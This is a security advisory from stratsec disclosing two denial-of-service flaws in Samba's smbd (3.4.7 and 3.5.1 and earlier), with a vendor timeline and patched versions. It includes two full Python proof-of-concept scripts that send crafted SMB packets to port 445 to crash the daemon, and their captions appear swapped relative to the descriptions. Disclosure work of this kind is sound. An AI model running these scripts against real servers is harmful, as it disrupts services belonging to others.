1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 |
=============================================================================== stratsec Security Advisory: SS-2010-005 =============================================================================== Title: Samba Multiple DoS Vulnerabilities Version: 1.0 Issue type:Multiple Affected vendor: Samba Release date:12/05/2010 Discovered by: Laurent Gaffié Issue status:Patch available =============================================================================== Summary ------- Two vulnerabilities were discovered within in the Samba Smbd daemon which allow an attacker to trigger a null pointer dereference or an uninitialized variable read by sending a specific 'Sessions Setup AndX' query. Successful exploitation of these issues will result in a denial of service. Description ----------- The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS) acts as an application-layer protocol to provide shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) operations. After negotiating an SMB communication the client sends a 'Session Setup AndX' packet to negotiate a session in order to be able to connect on a specific share. To trigger the null pointer dereference, the client needs to send a crafted SMB 'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003' (no Unicode), followed by a Session Setup AndX request with the SMB header 'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash within the Smbd process. The uninitialised Variable Read issue, can be triggered if the client sends a crafted 'Session Setup AndX' with a 'security blob length' value set to '\xff\xff'. Impact ------ A remote attacker can cause a denial of service within the Samba daemon Affected products ----------------- Samba <=3.4.7 and Samba <= 3.5.1 Proof of concept ---------------- To trigger the uninitialised variable read issue, the following Python proof of concept is available: import sys,socket from socket import * if len(sys.argv)<=1: sys.exit('Usage: python smbd.py 10.0.0.12') host = sys.argv[1],445 packetnego=( "\x00\x00\x00\xaa" "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00" "\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49" "\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46" "\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00" "\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64" "\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75" "\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30" "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e" "\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00" ) payload=( "\x00\x00\x01\xa3" "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00" "\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00" "\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed" "\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b" "\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad" "\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41" "\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72" "\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54" "\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77" "\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38" "\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" "\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e" "\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00" "\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31" "\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34" "\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f" "\x3f\x3f\x00" ) s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.send(''.join(packetnego)) s.send(''.join(payload)) To trigger the null pointer dereference issue this Python proof of concept is available: import sys,socket from socket import * if len(sys.argv)<=1: sys.exit('python smbd.py 10.0.0.12') host = sys.argv[1],445 packetnego=( "\x00\x00\x00\x85" "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00" "\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d" "\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66" "\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e" "\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20" "\x30\x2e\x31\x32\x00" ) payload=( "\x00\x00\x00\xec" "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00" "\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00" "\xff\xff"## Security blob set to \xff\xff here "\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b" "\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b" "\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c" "\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28" "\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00" "\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00" "\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00" "\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00" "\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00" "\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00" ) s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.send(''.join(packetnego)) s.send(''.join(payload)) Solution -------- Update to version 3.5.2 or 3.4.8 (http://samba.org/) Response timeline ----------------- * 09/03/2010 - Null pointer dereference issue reported to vendor. * 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after receiving the initial email * 09/03/2010 - Vendor confirms issue presence, and provide a patch 3 hours after receiving the initial email. * 09/03/2010 - stratsec confirms patch resolves issue. * 15/03/2010 - Uninitialised Variable Read issue reported to vendor. * 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours after receiving the initial email. * 15/03/2010 - stratsec confirms patch resolves issue * 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues. * 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues. * 12/05/2010 - This advisory published. References ---------- * Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html * https://bugzilla.samba.org/show_bug.cgi?id=7254 * stratsec would like to thanks the Samba Security Team for their responsiveness while handling theses issues =============================================================================== About stratsec -------------- stratsec, specialises in providing information security consulting and testing services for government and commercial clients. Established in 2004, we are now one of the leading independent information security companies in the Australasian and SE-Asian region, with offices throughout Australia and in Singapore and Malaysia. For more information, please visit our website at http://www.stratsec.net/ =============================================================================== |